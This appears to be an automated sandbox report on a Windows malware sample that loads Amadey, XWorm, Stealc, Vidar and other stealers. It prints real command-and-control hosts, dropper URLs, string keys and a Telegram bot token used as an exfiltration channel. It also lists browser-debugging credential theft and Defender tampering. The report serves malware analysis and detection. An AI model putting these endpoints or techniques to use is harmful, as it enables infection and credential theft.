Analysis

  • max time kernel
    119s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/02/2025, 07:47

General

  • Target

    5f8da7bbdafaed3095a2fef9f7caf45c.exe

  • Size

    2.0MB

  • MD5

    5f8da7bbdafaed3095a2fef9f7caf45c

  • SHA1

    595731a346e573a217c1030789f8dbf930280dc7

  • SHA256

    91cb26a8c61b268414be31010f6a8e894bca70579775d4e1f0acc32da3201e12

  • SHA512

    f8a01fdb8ad387de77dd9937046f32841540740c418adf101de0029710e7af0b66ed0930f89bf9d1ee28c6b4f151c57bd5b9f512026e0f177fa63826d974ea11

  • SSDEEP

    49152:blUpxSuxR0/pUg5eJStVgOBnpujtzqqPRrM01GEZ3rQPzBwvtYyfRvaX2A:blUpxBxR0/pzeguObytzqarj/JYtwvna

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz

Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

185.163.204.65:7000

Mutex

SWaSxcOz2FkLWFU7

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042

aes.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

93.186.202.3

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Poverty Stealer Payload 1 IoCs
  • Detect Vidar Stealer 6 IoCs
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

  • Povertystealer family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 27 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 29 IoCs
  • Uses browser remote debugging 2 TTPs 22 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 54 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 27 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 19 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 38 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\5f8da7bbdafaed3095a2fef9f7caf45c.exe
    "C:\Users\Admin\AppData\Local\Temp\5f8da7bbdafaed3095a2fef9f7caf45c.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3976
      • C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
        "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4828
      • C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe
        "C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4528
      • C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe
        "C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1560
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          4⤵
          • Uses browser remote debugging
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3692
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa0dbdcc40,0x7ffa0dbdcc4c,0x7ffa0dbdcc58
            5⤵
              PID:540
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1896,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:2
              5⤵
                PID:3900
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2052,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2112 /prefetch:3
                5⤵
                  PID:1668
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2480 /prefetch:8
                  5⤵
                    PID:3876
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3156 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:4732
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3328 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:4248
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4252 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:1596
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4648 /prefetch:8
                    5⤵
                      PID:2428
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4644 /prefetch:8
                      5⤵
                        PID:1660
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4708 /prefetch:8
                        5⤵
                          PID:5000
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                        4⤵
                        • Uses browser remote debugging
                        • Enumerates system info in registry
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        PID:548
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa2100cc40,0x7ffa2100cc4c,0x7ffa2100cc58
                          5⤵
                            PID:1520
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1916 /prefetch:2
                            5⤵
                              PID:3588
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2180 /prefetch:3
                              5⤵
                                PID:436
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2652 /prefetch:8
                                5⤵
                                  PID:3968
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
                                  5⤵
                                  • Uses browser remote debugging
                                  PID:1660
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3380 /prefetch:1
                                  5⤵
                                  • Uses browser remote debugging
                                  PID:2252
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:8
                                  5⤵
                                    PID:1432
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:1
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:488
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4828 /prefetch:8
                                    5⤵
                                      PID:4916
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4232 /prefetch:8
                                      5⤵
                                        PID:4924
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4904,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5036 /prefetch:8
                                        5⤵
                                          PID:4468
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                        4⤵
                                        • Uses browser remote debugging
                                        • Enumerates system info in registry
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        • Suspicious use of FindShellTrayWindow
                                        PID:4984
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa210146f8,0x7ffa21014708,0x7ffa21014718
                                          5⤵
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4644
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
                                          5⤵
                                            PID:1112
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
                                            5⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2972
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
                                            5⤵
                                              PID:2064
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:3024
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:1672
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:3688
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:2388
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\d2dbi" & exit
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5916
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 10
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              • Delays execution with timeout.exe
                                              PID:2340
                                        • C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3696
                                        • C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1112
                                        • C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5000
                                        • C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Drops file in Windows directory
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3372
                                          • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                            "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                                            4⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4072
                                            • C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe"
                                              5⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Drops file in Windows directory
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1236
                                        • C:\Users\Admin\AppData\Local\Temp\1090673001\e521e66b6b.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1090673001\e521e66b6b.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1104
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            4⤵
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5108
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:6700
